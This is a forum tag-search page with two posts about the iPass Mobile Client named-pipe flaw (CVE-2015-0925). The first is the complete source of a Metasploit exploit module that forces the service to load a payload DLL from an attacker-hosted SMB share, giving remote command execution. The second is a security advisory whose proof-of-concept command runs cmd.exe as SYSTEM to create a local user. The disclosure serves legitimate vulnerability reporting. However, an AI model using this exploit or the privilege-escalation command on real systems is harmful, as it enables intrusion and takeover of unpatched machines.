Search the Community
Showing results for tags 'ipass'.
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client::Authenticated include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'IPass Control Pipe Remote Command Execution', 'Description' => %q{ This module exploits a vulnerability in the IPass Client service. This service provides a named pipe which can be accessed by the user group BUILTIN\Users. This pipe can be abused to force the service to load a DLL from a SMB share. }, 'Author' => [ 'Matthias Kaiser', # Vulnerability discovery 'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-0925' ], [ 'OSVDB', '117423' ], [ 'BID', '72265' ], [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ [ 'Windows x32', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'Privileged' => true, 'DisclosureDate' => 'Jan 21 2015', 'DefaultTarget' => 0)) register_options( [ OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME') end def check echo_value = rand_text_alphanumeric(rand(10) + 10) begin response = send_command("System.Echo #{echo_value}") if response =~ Regexp.new(echo_value) return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Unknown end rescue Rex::ConnectionError => e vprint_error("Connection failed: #{e.class}: #{e}") return Msf::Exploit::CheckCode::Unknown rescue Rex::Proto::SMB::Exceptions::LoginError => e vprint_error('Connection reset during login') return Msf::Exploit::CheckCode::Unknown end end def setup super self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll" self.share = Rex::Text.rand_text_alpha(5) end def primer self.file_contents = generate_payload_dll print_status("File available on #{unc}...") send_command("iPass.SWUpdateAssist.RegisterCOM #{unc}") end def send_command(command) # The connection is closed after each command, so we have to reopen it connect smb_login pipe = simple.create_pipe('\\IPEFSYSPCPIPE') pipe.write(Rex::Text.to_unicode(command)) response = Rex::Text.to_ascii(pipe.read) response end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) { super } rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end end Source
-
Mogwai Security Advisory MSA-2015-03 ---------------------------------------------------------------------- Title: iPass Mobile Client service local privilege escalation Product: iPass Mobile Client Affected versions: iPass Mobile Client 2.4.2.15122 (Newer version might be also affected) Impact: medium Remote: no Product link: http://www.ipass.com/laptops/ Reported: 11/03/2015 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) Vendor's Description of the Software: ---------------------------------------------------------------------- The iPass Open Mobile client for laptops is lightweight and always on. It provides easy, seamless connectivity across iPass, customer, and third-party networks, and allows you to mix and match carrier networks without disrupting your users. The iPass Open Mobile client for laptops allows organizations to provide granular options for how employees connect to iPass Wi-Fi (the iPass Mobile Network), campus Wi-Fi, mobile broadband (3G/4G), Ethernet, and dial, using a single platform to manage all connections. Open Mobile also enables cost and security controls that provide virtual private network (VPN) integration options; mobile broadband 3G/4G usage controls for both data roaming and data usage; endpoint integrity verification that checks the security of the device at the point of connection; and several additional options for setting network connection and restriction policies. Insight into an organizations mobility usage is provided through user and device activity and summary reports as well as mobile broadband usage reports. ----------------------------------------------------------------------- Vendor response: ----------------------------------------------------------------------- "We do not consider this a vulnerability as it is how the product was designed" Business recommendation: ----------------------------------------------------------------------- Disable the iPass service unless really required -- CVSS2 Ratings ------------------------------------------------------ CVSS Base Score: 5.6 Impact Subscore: 7.8 Exploitability Subscore: 3.9 CVSS v2 Vector (AV:L/AC:L/Au:N/C:P/I:C/A:N) ----------------------------------------------------------------------- Vulnerability description: ---------------------------------------------------------------------- The iPass Open Mobile Windows Client utilizes named pipes for interprocess communication. One of these pipes accepts/forwards commands to the iPass plugin subsystem. A normal user can communicate with this pipe through the command line client EPCmd.exe which is part of the iPass suite. A list of available commands can be displayed via "System.ListAllCommands". The iPass pipe provides a "iPass.EventsAction.LaunchAppSysMode" command which allows to execute arbitrary commands as SYSTEM. This can be abused by a normal user to escalate his local privileges. Please note that this issue can also be exploited remotely in version 2.4.2.15122 as the named pipe can also be called via SMB. However according to our information, the pipe is no longer remotely accessible in current versions of the iPass Mobile client. Proof of concept: ---------------------------------------------------------------------- The following EPCmd command line creates a local user "mogwai" with password "mogwai": EPCmd.exe iPass.EventsAction.LaunchAppSysMode c:\windows\system32\cmd.exe;"/c net user mogwai mogwai /ADD;; Disclosure timeline: ---------------------------------------------------------------------- 10/03/2015: Requesting security contact from iPass sales 10/03/2015: Sales responded, will forward vulnerability information to the development 11/03/2015: Sending vulnerability details 11/03/2015: iPass asks which customer we represent 11/03/2015: Responding that we don't represent any iPass customer 12/03/2015: iPass responded, wont fix, says that the product works as designed Advisory URL: ---------------------------------------------------------------------- https://www.mogwaisecurity.de/#lab ---------------------------------------------------------------------- Mogwai, IT-Sicherheitsberatung Muench Steinhoevelstrasse 2/2 89075 Ulm (Germany) info@mogwaisecurity.de Source